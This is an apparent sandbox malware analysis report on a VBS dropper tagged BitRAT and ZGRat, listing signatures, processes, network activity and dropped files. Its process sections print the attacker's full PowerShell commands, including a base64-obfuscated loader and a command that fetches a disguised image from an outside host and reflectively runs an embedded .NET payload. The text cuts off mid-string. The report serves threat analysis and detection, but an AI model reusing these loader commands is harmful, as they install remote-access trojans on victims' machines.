Malware Analysis Report

2025-01-03 05:26

Sample ID 231013-qazg6shh6w
Target Gr93837650.vbs
SHA256 ae080dec7fd62072cfbf9e4fe793bba4565826c3587050b321192aaf6a797e1d
Tags
bitrat zgrat rat trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ae080dec7fd62072cfbf9e4fe793bba4565826c3587050b321192aaf6a797e1d

Threat Level: Known bad

The file Gr93837650.vbs was found to be: Known bad.

Malicious Activity Summary

bitrat zgrat rat trojan upx

BitRAT

ZGRat

Detect ZGRat V1

Blocklisted process makes network request

Checks computer location settings

Drops startup file

UPX packed file

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-13 13:04

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-13 13:04

Reported

2023-10-13 13:15

Platform

win7-20230831-en

Max time kernel

286s

Max time network

319s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Gr93837650.vbs"

Signatures

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Gr93837650.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreIDgTreDgTre9DgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre2DgTreDEDgTreNgDgTrevDgTreDYDgTreMDgTreDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrecgB1DgTreG0DgTrecDgTreBfDgTreHYDgTreYgBzDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDYDgTreOQDgTre1DgTreDQDgTreMDgTreDgTre4DgTreDkDgTreMwDgTre3DgTreCcDgTreOwDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTreuDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreKQDgTre7DgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreEYDgTreaQBiDgTreGUDgTrecgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTrecDgTreBoDgTreHDgTreDgTreLgBiDgTreHYDgTreLwBnDgTreG4DgTreLgBtDgTreG8DgTreYwDgTreuDgTreGQDgTrebDgTreByDgTreG8DgTredwBlDgTreHIDgTreYQBsDgTreGMDgTreZQBkDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDIDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreFYDgTreYgBzDgTreE4DgTreYQBtDgTreGUDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFcDgTreaQBuDgTreGQDgTrebwB3DgTreHMDgTreXDgTreBUDgTreGUDgTrebQBwDgTreFwDgTreJwDgTresDgTreCDgTreDgTreJwBMDgTreG4DgTreawBODgTreGEDgTrebQBlDgTreCcDgTreKQDgTrepDgTreDgTre=='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('DgTre','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\VbsName.vbs -Force }

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('php.bv/gn.moc.dlroweralced//:sptth' , '' , '2' , 'VbsName' , '1' , 'C:\Windows\Temp\', 'LnkName'))"

Network

Country Destination Domain Proto
US 8.8.8.8:53 uploaddeimagens.com.br udp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8PU761WO0IUGP9FHTUIG.temp

MD5 7889ad058592ac0680ee53a5b0c5cb2e
SHA1 c600d3394fcf04ab280a5550c28d83e3925c9f1b
SHA256 b5e3e24e42d734df22996a600a99b3cd9f548d0c3abca47beff688027046d53c
SHA512 6acb43d8697103e6428f877b7f277d46f82d8ef7d2324edea290aed3476d3b13171767eb0ee6874cff0508cd70b9ed05d1be5d9eeb24b109a4a89df32ac5294c

memory/2624-24-0x000000001B220000-0x000000001B502000-memory.dmp

memory/2624-25-0x0000000002390000-0x0000000002398000-memory.dmp

memory/2744-26-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/2624-27-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/2744-28-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/2624-29-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/2624-30-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/2624-31-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/2744-32-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/2624-33-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/2744-34-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/2744-35-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/2744-36-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/2624-37-0x0000000002970000-0x00000000029F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7889ad058592ac0680ee53a5b0c5cb2e
SHA1 c600d3394fcf04ab280a5550c28d83e3925c9f1b
SHA256 b5e3e24e42d734df22996a600a99b3cd9f548d0c3abca47beff688027046d53c
SHA512 6acb43d8697103e6428f877b7f277d46f82d8ef7d2324edea290aed3476d3b13171767eb0ee6874cff0508cd70b9ed05d1be5d9eeb24b109a4a89df32ac5294c

memory/3040-43-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/3040-44-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/3040-46-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/3040-47-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2624-49-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/3040-48-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2744-50-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/2744-51-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/2744-52-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/2744-53-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/3040-55-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/3040-54-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/3040-58-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

memory/2744-59-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-13 13:04

Reported

2023-10-13 13:15

Platform

win10-20230915-en

Max time kernel

311s

Max time network

321s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Gr93837650.vbs"

Signatures

BitRAT

trojan bitrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LnkName.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4816 set thread context of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4416 wrote to memory of 2864 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4416 wrote to memory of 2864 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4416 wrote to memory of 2160 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4416 wrote to memory of 2160 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 4816 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 4816 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4816 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4816 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4816 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4816 wrote to memory of 5116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4816 wrote to memory of 5116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4816 wrote to memory of 5116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4816 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4816 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4816 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4816 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4816 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4816 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4816 wrote to memory of 1528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Gr93837650.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreIDgTreDgTre9DgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre2DgTreDEDgTreNgDgTrevDgTreDYDgTreMDgTreDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrecgB1DgTreG0DgTrecDgTreBfDgTreHYDgTreYgBzDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDYDgTreOQDgTre1DgTreDQDgTreMDgTreDgTre4DgTreDkDgTreMwDgTre3DgTreCcDgTreOwDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTreuDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreKQDgTre7DgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgT